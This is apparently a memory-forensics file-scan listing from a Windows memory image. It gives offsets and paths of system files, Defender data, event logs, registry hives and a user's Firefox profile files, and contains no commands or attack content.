+0x918b75aa0a70 \$Directory 216 +0x918b75aa0c00 \Windows\System32\dllhost.exe 216 +0x918b75aa0d90 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\ActivationStore.dat 216 +0x918b75aa10b0 \Windows\System32\spinf.dll 216 +0x918b75aa1240 \$Directory 216 +0x918b75aa13d0 \$Directory 216 +0x918b75aa1560 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1 216 +0x918b75aa16f0 \Windows\System32\taskschd.dll 216 +0x918b75aa1880 \Windows\System32\dllhost.exe 216 +0x918b75aa1a10 \Windows\System32 216 +0x918b75aa1d30 \Windows\Registration\R000000000006.clb 216 +0x918b75aa21e0 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2 216 +0x918b75aa2370 \$Directory 216 +0x918b75aa2500 \Windows\System32\srvcli.dll 216 +0x918b75aa2690 \Windows\System32\en-US\twinapi.appcore.dll.mui 216 +0x918b75aa2820 \Windows\System32\comsvcs.dll 216 +0x918b75aa29b0 \Windows\System32\bcd.dll 216 +0x918b75aa2b40 \ProgramData\Microsoft\Diagnosis\EventStore.db-wal 216 +0x918b75aa2cd0 \Windows\System32\winevt\Logs\Microsoft-Windows-UniversalTelemetryClient%4Operational.evtx 216 +0x918b75aa2e60 \Windows\System32\winevt\Logs\Microsoft-Windows-Windows Firewall With Advanced Security%4FirewallDiagnostics.evtx 216 +0x918b75aa3180 \ProgramData\Microsoft\Windows Defender\Support\MPScanSkip-20231117-153013.log 216 +0x918b75aa34a0 \Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-Scheduled%4Operational.evtx 216 +0x918b75aa3630 \$Directory 216 +0x918b75aa37c0 \Windows\System32\DWrite.dll 216 +0x918b75aa3950 \Windows\Registration\{02D4B3F1-FD88-11D1-960D-00805FC79235}.{6682993A-C0E8-4D3F-BF57-F45542DC534B}.crmlog 216 +0x918b75aa3ae0 \ProgramData\Microsoft\Windows Defender\Support\MPDeviceControl-20231117-153013.log 216 +0x918b75aa3c70 \$Directory 216 +0x918b75aa3e00 \ProgramData\Microsoft\Diagnosis\EventStore.db-shm 216 +0x918b75aa4120 \ProgramData\Microsoft\Windows Defender\Support\MpWppTracing-20231117-154944-00000003-ffffffff.bin 216 +0x918b75aa42b0 \Windows\System32\txflog.dll 216 +0x918b75aa45d0 \ProgramData\Microsoft\Windows Defender\Support\MPDetection-20231116-212734.log 216 +0x918b75aa4760 \Windows\Registration\R000000000006.clb 216 +0x918b75aa48f0 \Windows\System32\FlightSettings.dll 216 +0x918b75aa4a80 \Windows\System32\stdole2.tlb 216 +0x918b75aa4c10 \Windows\System32\mskeyprotect.dll 216 +0x918b75aa4da0 \Windows\System32\BcastDVRCommon.dll 216 +0x918b75aa50c0 \Windows\System32\bcastdvruserservice.dll 216 +0x918b75aa5250 \$Directory 216 +0x918b75aa53e0 \Program Files\WindowsApps\Microsoft.XboxGamingOverlay_6.123.10181.0_x64__8wekyb3d8bbwe\GameBar.exe 216 +0x918b75aa5570 \Windows\System32\comres.dll 216 +0x918b75aa5700 \Windows\SysWOW64\Windows.ApplicationModel.dll 216 +0x918b75aa5890 \Windows\System32\mtxoci.dll 216 +0x918b75aa5a20 \$Directory 216 +0x918b75aa5bb0 \$Directory 216 +0x918b75aa5d40 \Windows\System32\xolehlp.dll 216 +0x918b75aa5ed0 \Windows\System32\ktmw32.dll 216 +0x918b75aa61f0 \Windows\System32\sspicli.dll 216 +0x918b75aa6380 \Windows\System32\mtxclu.dll 216 +0x918b75aa66a0 \ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db 216 +0x918b75aa6830 \ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db-shm 216 +0x918b75aa69c0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b75aa6b50 \Windows\System32\msdtc.exe 216 +0x918b75aa6ce0 \Windows\System32\en-US\combase.dll.mui 216 +0x918b75aa6e70 \Windows\System32\amsi.dll 216 +0x918b75aa7190 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b75aa7320 \Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db 216 +0x918b75aa74b0 \ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db-wal 216 +0x918b75aa7640 \Windows\System32\cscapi.dll 216 +0x918b75aa77d0 \ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db-wal 216 +0x918b75aa7960 \Windows\Registration\R000000000006.clb 216 +0x918b75aa7af0 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpOAV.dll 216 +0x918b75aa7c80 \Windows\System32\Windows.UI.Core.TextInput.dll 216 +0x918b75aa7e10 \Windows\System32 216 +0x918b75aa8130 \Windows\System32\msdtcprx.dll 216 +0x918b75aa82c0 \Windows\Fonts\segoeui.ttf 216 +0x918b75aa8450 \ProgramData\Microsoft\Windows Defender\Support\MpWppTracing-20231117-154944-00000003-ffffffff.bin 216 +0x918b75aa85e0 \ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db-shm 216 +0x918b75aa8a90 \Windows\System32\storewuauth.dll 216 +0x918b75aa8db0 \Windows\System32\en-US\msdtcVSp1res.dll.mui 216 +0x918b75aa90d0 \Windows\System32\wbem\WmiPrvSD.dll 216 +0x918b75aa9260 \Windows\System32\MsDtc\Trace\dtctrace.log 216 +0x918b75aa93f0 \Windows\System32\wbem\wbemess.dll 216 +0x918b75aa9580 \Windows\Registration\R000000000006.clb 216 +0x918b75aa9710 \Users\santa\AppData\Local\Mozilla\Firefox\Profiles\888jya8e.default-release\cache2\entries\90986EF1909EF6B5244F9775F7FBF9E3ADD68DE9 216 +0x918b75aa9a30 \Windows\System32\OneCoreCommonProxyStub.dll 216 +0x918b75aa9d50 \ProgramData\Microsoft\Diagnosis\Sideload 216 +0x918b75aa9ee0 \Device\HarddiskVolume4\Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat{80f87ee9-850a-11ee-b495-000c29cb6a43}.TM 216 +0x918b75aaa200 \Windows\System32\en-US\msdtc.exe.mui 216 +0x918b75aaa390 \Windows\System32\msdtctm.dll 216 +0x918b75aaa6b0 \Windows\System32\ncobjapi.dll 216 +0x918b75aaa840 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\Drivers\WdNisDrv.sys 216 +0x918b75aaa9d0 \Windows\System32\msdtclog.dll 216 +0x918b75aaab60 \$Directory 216 +0x918b75aaae80 \wkssvc 216 +0x918b75aab330 \Windows\System32\MsDtc\MSDTC.LOG 216 +0x918b75aab4c0 \Windows\System32\Windows.UI.Xaml.Resources.19h1.dll 216 +0x918b75aab650 \CMApi 216 +0x918b75aab970 \Device\HarddiskVolume4\Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat{80f87ee9-850a-11ee-b495-000c29cb6a43}.TM 216 +0x918b75aabb00 \Windows\System32\aepic.dll 216 +0x918b75aabe20 \Windows\System32\TileDataRepository.dll 216 +0x918b75c24150 \Windows\System32\Windows.Globalization.dll 216 +0x918b75c242e0 \Windows\System32 216 +0x918b75c24470 \Windows\System32\catsrv.dll 216 +0x918b75c24600 \Windows\System32\winevt\Logs\Parameters.evtx 216 +0x918b75c24790 \Windows\appcompat\Programs\Amcache.hve.LOG2 216 +0x918b75c24ab0 \Windows\System32\spp\store\2.0\data.dat 216 +0x918b75c24c40 \$Directory 216 +0x918b75c24dd0 \Windows\System32 216 +0x918b75c250f0 \Windows\appcompat\Programs\Amcache.hve.LOG1 216 +0x918b75c25280 \Windows\System32\en-US\winhttp.dll.mui 216 +0x918b75c25410 \Windows\Fonts\seguisb.ttf 216 +0x918b75c255a0 \Windows\System32\catsrvut.dll 216 +0x918b75c25730 \Windows\appcompat\Programs\Amcache.hve 216 +0x918b75c258c0 \$Directory 216 +0x918b75c25a50 \Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx 216 +0x918b75c25d70 \Windows\System32\wbem\WmiPrvSE.exe 216 +0x918b75c26090 \Windows\System32\mfcsubs.dll 216 +0x918b75c26220 \Windows\System32\Windows.StateRepositoryCore.dll 216 +0x918b75c263b0 \Windows\Registration\R000000000006.clb 216 +0x918b75c26540 \Windows\Fonts\consola.ttf 216 +0x918b75c266d0 \Windows\System32\notepad.exe 216 +0x918b75c26860 \Windows\System32\AppxAllUserStore.dll 216 +0x918b75c269f0 \Windows\System32\catsrvps.dll 216 +0x918b75c26d10 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b75c26ea0 \Windows\System32\directmanipulation.dll 216 +0x918b75c271c0 \Windows\System32\en-US\notepad.exe.mui 216 +0x918b75c27800 \Windows\System32\Windows.UI.Xaml.InkControls.dll 216 +0x918b75c27990 \$Directory 216 +0x918b75c27b20 \CMApi 216 +0x918b75c27cb0 \Windows\System32\Windows.UI.Xaml.Maps.dll 216 +0x918b75c28160 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b75c287a0 \$Directory 216 +0x918b75c28930 \Windows\System32\msxml6.dll 216 +0x918b75c28ac0 \Windows\System32\msxml6r.dll 216 +0x918b75c28c50 \$Directory 216 +0x918b75c28de0 \Windows\System32\Windows.UI.Xaml.Phone.dll 216 +0x918b75c29100 \Windows\System32\wbem\cimwin32.dll 216 +0x918b75c29290 \CMApi 216 +0x918b75c295b0 \Windows\System32 216 +0x918b75c29740 \Windows\System32\spp\store\2.0\data.dat 216 +0x918b75c298d0 \Windows\System32\en-US\notepad.exe.mui 216 +0x918b75c29a60 \Windows\Registration\R000000000006.clb 216 +0x918b75c29d80 \Windows\System32\framedynos.dll 216 +0x918b75c2a0a0 \Windows\System32\en-US\user32.dll.mui 216 +0x918b75c2a230 \Windows\Registration\R000000000006.clb 216 +0x918b75c2a3c0 \Windows\System32\sppwinob.dll 216 +0x918b75c2aa00 \Windows\Fonts\StaticCache.dat 216 +0x918b75c2ad20 \Windows\System32\fltLib.dll 216 +0x918b75c2aeb0 \Windows\Fonts\mmrtextb.ttf 216 +0x918b75c2b680 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite 216 +0x918b75c2b810 \Windows\Registration\R000000000006.clb 216 +0x918b75c2bcc0 \Windows\System32\wscapi.dll 216 +0x918b75c2be50 \Windows\Fonts\seguisb.ttf 216 +0x918b75c2c300 \Windows\Registration\R000000000006.clb 216 +0x918b75c2c490 \CMApi 216 +0x918b75c2c620 \Windows\System32\Windows.UI.Xaml.Controls.dll 216 +0x918b75c2c7b0 \Windows\System32\pkeyhelper.dll 216 +0x918b75c2c940 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b75c2c970 질痂醋￿질痂醋￿ 0 +0x918b75c2cc60 \Windows\System32\wbem\en-US\cimwin32.dll.mui 216 +0x918b75c2cdf0 \Windows\SystemResources\notepad.exe.mun 216 +0x918b75c2d430 \Windows\explorer.exe 216 +0x918b75c2d750 \$Directory 216 +0x918b75c2d8e0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite-shm 216 +0x918b75c2da70 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite-shm 216 +0x918b75c2dc00 \Users\santa\ntuser.dat.LOG1 216 +0x918b75c2e3d0 \Windows\Registration\R000000000006.clb 216 +0x918b75c2e560 \$Directory 216 +0x918b75c2e6f0 \Windows\System32\normidna.nls 216 +0x918b75c2e880 \Windows\System32\CertEnroll.dll 216 +0x918b75c2eba0 \Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx 216 +0x918b75c2ed30 \$Directory 216 +0x918b75c2eec0 \$Directory 216 +0x918b75c2f1e0 \Windows\Fonts\segoeuisl.ttf 216 +0x918b75c2f690 \Users\santa\NTUSER.DAT 216 +0x918b75c2f820 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite-wal 216 +0x918b75c2fb40 \$Directory 216 +0x918b75c2fcd0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite 216 +0x918b75c2fe60 \$Directory 216 +0x918b75c30180 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite-wal 216 +0x918b75c30310 \Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx 216 +0x918b75c304a0 \Windows\Fonts\StaticCache.dat 216 +0x918b75c307c0 \$Directory 216 +0x918b75c30950 \$Directory 216 +0x918b75c30c70 \$Directory 216 +0x918b75c30e00 \Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG2 216 +0x918b75c31120 \Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1 216 +0x918b75c312b0 \$Directory 216 +0x918b75c31440 \Device\HarddiskVolume4\Users\santa\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b75c315d0 \Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat{80f87ee9-850a-11ee-b495-000c29cb6a43}.TMContainer00000000000000000002.regtrans-ms 216 +0x918b75c31760 \$Directory 216 +0x918b75c318f0 \Windows\System32\IDStore.dll 216 +0x918b75c31c10 \Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat{80f87ee9-850a-11ee-b495-000c29cb6a43}.TMContainer00000000000000000001.regtrans-ms 216 +0x918b75c31da0 \$Directory 216 +0x918b75c320c0 \Users\santa\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000002.regtrans-ms 216 +0x918b75c32250 \Device\HarddiskVolume4\Users\santa\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM 216 +0x918b75c32570 \Users\santa\ntuser.dat.LOG2 216 +0x918b75c32890 \$Directory 216 +0x918b75c32a20 \Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat 216 +0x918b75c32bb0 \$Directory 216 +0x918b75c32d40 \Users\santa\AppData\Local\Microsoft\Windows\UsrClass.dat{80f87ee9-850a-11ee-b495-000c29cb6a43}.TM.blf 216 +0x918b75c32ed0 \Users\santa\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TM.blf 216 +0x918b75c331f0 \$Directory 216 +0x918b75c33380 \$Directory 216 +0x918b75c33510 \$Directory 216 +0x918b75c33830 \Users\santa\NTUSER.DAT{fd9a35db-49fe-11e9-aa2c-248a07783950}.TMContainer00000000000000000001.regtrans-ms 216 +0x918b75c339c0 \Windows\System32\Windows.CloudStore.dll 216 +0x918b75c33b50 \CMApi 216 +0x918b75c33ce0 \Windows\System32\en-US\combase.dll.mui 216 +0x918b75c33e70 \Windows\System32\en-US\dps.dll.mui 216 +0x918b75c34190 \Windows\System32\en-US\winmmbase.dll.mui 216 +0x918b75c34320 \$Directory 216 +0x918b75c344b0 \Windows\System32\en-US\propsys.dll.mui 216 +0x918b75c34640 \Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f 216 +0x918b75c34960 \Windows\System32\en-US\sysmain.dll.mui 216 +0x918b75c34c80 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b75c34e10 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite-wal 216 +0x918b75c352c0 \$Directory 216 +0x918b75c355e0 \$Directory 216 +0x918b75c35770 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b75c35900 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\content-prefs.sqlite 216 +0x918b75c35a90 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd 216 +0x918b75c35c20 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd 216 +0x918b75c35db0 \$Directory 216 +0x918b75c360d0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\places.sqlite 216 +0x918b75c36260 \Windows\System32\svchost.exe 216 +0x918b75c363f0 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite 216 +0x918b75c36580 \Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\favicons.sqlite-wal 216 +0x918b75c36710 \Windows\Registration\R000000000006.clb 216 +0x918b75c36a30 \Windows\System32 216 +0x918b75c36bc0 \$Directory 216 +0x918b75c36d50 \$Directory 216 +0x918b75c37200 \Windows\System32\SmartCardBackgroundPolicy.dll 216 +0x918b75c376b0 \Windows\Fonts\palab.ttf 216 +0x918b75c37840 \Windows\Fonts\pala.ttf 216 +0x918b75c37cf0 \Windows\Fonts\palabi.ttf 216 +0x918b75c37e80 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Deployment.srd-shm 216 +0x918b75c38330 \ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.LockApp_10.0.18362.1_neutral__cw5n1h2txyewy\ActivationStore.dat 216 +0x918b75c384c0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b75c387e0 \gecko.4576.3988.14086781544336770055 216 +0x918b75c38b00 \Windows\System32\sppobjs.dll 216 +0x918b75c392d0 \$Directory 216 +0x918b75c39780 \gecko.4576.3988.14086781544336770055 216 +0x918b75c39910 \Windows\Fonts\times.ttf 216 +0x918b75c39c30 \Windows\System32\en-US\lsm.dll.mui 216 +0x918b75c3a0e0 \Windows\System32\wbem\WmiPrvSE.exe 216 +0x918b75c3a270 \Windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4WHC.evtx 216 +0x918b75c3a590 \$Directory 216 +0x918b75c3a720 \Windows\Fonts\palai.ttf 216 +0x918b75c3aa40 \Windows\System32\en-US\user32.dll.mui 216 +0x918b75c3abd0 \Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Operational.evtx 216 +0x918b75c3b080 \Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx 216 +0x918b75c3b530 \Windows\System32\winevt\Logs\Microsoft-Windows-SettingSync%4Debug.evtx 216 +0x918b75c3b6c0 \Windows\System32\certca.dll 216 +0x918b75c3b850 \Windows\Fonts\segoescb.ttf 216 +0x918b75c3bb70 \Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4BackUpKeySvc.evtx 216 +0x918b75c3bd00 \Windows\System32 216 +0x918b75c3be90 \Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx 216 +0x918b75c3c1b0 \$Directory 216 +0x918b75c3c340 \Windows\Registration\R000000000006.clb 216 +0x918b75c3c4d0 \Windows\Fonts\segoeprb.ttf 216 +0x918b75c3c660 \Windows\System32\pdh.dll 216 +0x918b75c3c980 \Windows\System32\AppXDeploymentServer.dll 216 +0x918b75c3cca0 \Windows\System32\wbem\WmiPerfClass.dll 216 +0x918b75c3ce30 \Windows\Fonts\segoesc.ttf 216 +0x918b75c3d790 \Windows\System32\dmcmnutils.dll 216 +0x918b75c3d920 \Windows\System32\omadmapi.dll 216 +0x918b75c3dab0 \$Directory 216 +0x918b75c3dc40 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpRtp.dll 216 +0x918b75c3ddd0 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\NisSrv.exe 216 +0x918b75c3f090 \ProgramData\Microsoft\Windows Defender\Scans\MpDiag.bin 216 +0x918b75c3f540 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpCommu.dll 216 +0x918b75c3f6d0 \Windows\System32\mdmregistration.dll 216 +0x918b75c3f860 \ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager\80A0E259-2BD8-4DD7-A23C-FCBC9D6451B7-0.bin 216 +0x918b75c40800 \Windows\System32\mshtml.dll 216 +0x918b75c412f0 \Windows\System32\iri.dll 216 +0x918b75c42290 \ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpengine.dll 216 +0x918b75c42740 \$Directory 216 +0x918b75c430a0 \Windows\System32\en-US\KernelBase.dll.mui 216 +0x918b75c43550 \Users\santa\AppData\Local\Microsoft\Windows\Burn 216 +0x918b75c436e0 \Windows\System32\en-US\mshtml.dll.mui 216 +0x918b75d77150 \Windows\ImmersiveControlPanel\SystemSettings.exe 216 +0x918b75d772e0 \Windows\Microsoft.NET\Framework64\v4.0.30319\CORPerfMonExt.dll 216 +0x918b75d77470 \Windows\System32\ucrtbase_clr0400.dll 216 +0x918b75d77600 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.67 216 +0x918b75d77790 \$Directory 216 +0x918b75d77920 \Windows\System32\en-US\ESENT.dll.mui 216 +0x918b75d77950 禨痗醋￿禨痗醋￿ 0 +0x918b75d77ab0 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.E6 216 +0x918b75d77c40 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.DB 216 +0x918b75d77dd0 \ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpavdlta.vdm 216 +0x918b75d780f0 \Windows\Microsoft.NET\Framework64\v4.0.30319\PerfCounter.dll 216 +0x918b75d78280 \Windows\System32\WofUtil.dll 216 +0x918b75d785a0 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.A0 216 +0x918b75d78730 \Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb 216 +0x918b75d788c0 \Windows\System32\vcruntime140_clr0400.dll 216 +0x918b75d78a50 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.6C 216 +0x918b75d78d70 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.80 216 +0x918b75d79090 \ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpasbase.vdm 216 +0x918b75d79220 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.87 216 +0x918b75d79540 \ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpavbase.vdm 216 +0x918b75d796d0 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.7E 216 +0x918b75d79860 \Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb 216 +0x918b75d79b80 \ProgramData\Microsoft\Windows Defender\Definition Updates\{945087C3-DEF1-474A-A297-2929D583B4F1}\mpasdlta.vdm 216 +0x918b75d79d10 \Program Files\Windows Defender\en-US\shellext.dll.mui 216 +0x918b75d79ea0 \Windows\System32\mscoree.dll 216 +0x918b75d7a1c0 \Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll 216 +0x918b75d7a350 \Windows\System32\svchost.exe 216 +0x918b75d7a4e0 \Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb 216 +0x918b75d7a670 \Windows\System32\en-US\ESENT.dll.mui 216 +0x918b75d7ae40 \Windows\System32\ssdpsrv.dll 216 +0x918b75d7b2f0 \Windows\System32\upnp.dll 216 +0x918b75d7b610 \Endpoint 216 +0x918b75d7b7a0 \Endpoint 216 +0x918b75d7b930 \Endpoint 216 +0x918b75d7bac0 \Endpoint 216 +0x918b75d7bc50 \Endpoint 216 +0x918b75d7c100 \Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb 216 +0x918b75d7c290 \ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm 216 +0x918b75d7c420 \Windows\System32 216 +0x918b75d7c740 \Endpoint 216 +0x918b75d7ca60 \Windows\System32\catroot2\{127D0A1D-4EF2-11D1-8608-00C04FC295EE}\catdb.jfm 216 +0x918b75d7cbf0 \Endpoint 216 +0x918b75d7d0a0 \Windows\System32\en-US\svchost.exe.mui 216 +0x918b75d7d230 \Windows\System32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb.jfm 216 +0x918b75d7d3c0 \Endpoint 216 +0x918b75d7d6e0 \Windows\System32\en-US\mswsock.dll.mui 216 +0x918b75d7d870 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.7C 216 +0x918b75d7da00 \Windows\System32\winevt\Logs\Microsoft-Windows-Bits-Client%4Operational.evtx 216 +0x918b75d7db90 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.83 216 +0x918b75d7dd20 \CMApi 216 +0x918b75d7e1d0 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.79 216 +0x918b75d7e4f0 \CMNotify 216 +0x918b75d7e680 \Windows\System32\en-US\winnlsres.dll.mui 216 +0x918b75d7e810 \Windows\System32\en-US\themeui.dll.mui 216 +0x918b75d7e9a0 \$Directory 216 +0x918b75d7eb30 \Windows\System32\en-US\sysmain.dll.mui 216 +0x918b75d7ecc0 \Windows\Fonts\times.ttf 216 +0x918b75d7f170 \ProgramData\Microsoft\Windows Defender\Scans\mpcache-80D920E3D804BCBC8CEBFB05C3A2284D99FCC016.bin.01 216 +0x918b75d7f300 \$Directory 216 +0x918b75d7f620 \CMNotify 216 +0x918b75d7f7b0 \CMNotify 216 +0x918b75d7f940 \Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe 216 +0x918b75d7fad0 \CMNotify 216 +0x918b75d7fc60 \$Directory 216 +0x918b75d7fdf0 \Windows\Prefetch\PfPre_e075aaec.mkd 216 +0x918b75d80110 \CMNotify 216 +0x918b75d802a0 \Windows\System32\en-US\Windows.Storage.Search.dll.mui 216 +0x918b75d80750 \ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db 216 +0x918b75d80a70 \$ConvertToNonresident 216 +0x918b75d80c00 \Windows\ImmersiveControlPanel\resources.pri 216 +0x918b75d80d90 \ProgramData\Microsoft\Windows Defender\Definition Updates\Updates 216 +0x918b75d810b0 \$Directory 216 +0x918b75d81240 \Windows\System32\en-US\combase.dll.mui 216 +0x918b75d813d0 \CMApi 216 +0x918b75d81560 \$Directory 216 +0x918b75d816f0 \Windows\en-US\explorer.exe.mui 216 +0x918b75d81880 \Windows\System32\WinMetadata\Windows.Foundation.winmd 216 +0x918b75d81a10 \$Directory 216 +0x918b75d81ba0 \Windows\System32\winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx 216 +0x918b75d81d30 \ProgramData\Microsoft\Windows Defender\IMpService77BDAF73-B396-481F-9042-AD358843EC24.lock 216 +0x918b75d81ec0 \Windows\System32\Windows.StateRepositoryPS.dll 216 +0x918b75d821e0 \Windows\System32\cryptnet.dll 216 +0x918b75d82500 \lsass 216 +0x918b75d82690 \ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db-shm 216 +0x918b75d829b0 \ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db-wal 216 +0x918b75d829e0 ⨸痘醋￿⨸痘醋￿ 29716 +0x918b75d82b40 \ProgramData\Microsoft\Windows Defender\IMpDlpService77BDAF73-B396-481F-9042-AD358843EC24.lock 216 +0x918b75d82cd0 \Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows-managed.dll 216 +0x918b75d83310 \ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db 216 +0x918b75d834a0 \$Directory 216 +0x918b75d837c0 \Windows\System32\winevt\Logs\Microsoft-Windows-ReadyBoost%4Operational.evtx 216 +0x918b75d83950 \Windows\System32 216 +0x918b75d83ae0 \Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Windows\Safety\network\local\sinkholeCache 216 +0x918b75d83c70 \Windows\System32\en-US\QuietHours.dll.mui 216 +0x918b75d83e00 \Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.32530.0_x64__8wekyb3d8bbwe\vccorlib140_app.dll 216 +0x918b75d84120 \gecko.4576.3988.9916641259275048487 216 +0x918b75d842b0 \gecko.4576.3988.9916641259275048487 216 +0x918b75d84440 \Windows\System32\NotificationController.dll 216 +0x918b75d845d0 \Windows\System32\en-US\lsm.dll.mui 216 +0x918b75d84760 \CMApi 216 +0x918b75d848f0 \Windows\System32\wininet.dll 216 +0x918b75d84a80 \Windows\System32 216 +0x918b75d84c10 \$Directory 216 +0x918b75d850c0 \Windows\System32\sihost.exe 216 +0x918b75d85250 \ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\NisSrv.exe 216 +0x918b75d853e0 \$Directory 216 